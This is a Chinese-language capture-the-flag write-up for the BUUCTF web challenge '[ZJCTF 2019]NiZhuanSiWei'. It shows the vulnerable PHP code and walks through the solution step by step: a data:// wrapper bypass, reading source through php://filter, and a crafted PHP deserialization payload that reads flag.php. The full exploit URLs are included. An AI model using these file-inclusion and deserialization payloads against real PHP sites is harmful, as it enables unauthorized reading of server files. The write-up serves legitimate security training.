buuctf(web):[ZJCTF 2019]NiZhuanSiWei 1
作者:互联网
打开链接,发现又是代码审计
<?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_match("/flag/",$file)){ echo "Not now!"; exit(); }else{ include($file); //useless.php $password = unserialize($password); echo $password; } } else{ highlight_file(__FILE__); } ?>
isset() 函数用于检测变量是否已设置并且非 NULL。
file_get_contents() 把整个文件读入一个字符串中。
这里需要我们传入一个文件且其内容为welcome to the zjctf,我们无法写入文件然后再去读取,可以利用file://、php://filter、php://input、zip://、compress.bzip2://、compress.zlib://、data://等伪协议相关点去绕过
这里可以利用data://协议绕过
text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
发现可以绕过
然后看第二个绕过点,可以传入file参数,但是过滤了flag
用php://filter协议来读取
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php
绕过后,读取到useless.php文件
<?php class Flag{ //flag.php public $file; public function __tostring(){ if(isset($this->file)){ echo file_get_contents($this->file); echo "<br>"; return ("U R SO CLOSE !///COME ON PLZ"); } } } ?>
file参数是我们可控的,所以我们可以先在自己本地测试一下得到的useless.php
<?php class Flag{ //flag.php public $file="flag.php"; public function __tostring(){ if(isset($this->file)){ echo file_get_contents($this->file); echo "<br>"; return ("U R SO CLOSE !///COME ON PLZ"); } } } $a = new Flag(); echo serialize($a); ?>
得到
这样我们就可以构造playload:
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
查看源代码,得到flag
标签:web,buuctf,ZJCTF,text,echo,useless,file,php,data 来源: https://www.cnblogs.com/Dreamerwd/p/15248556.html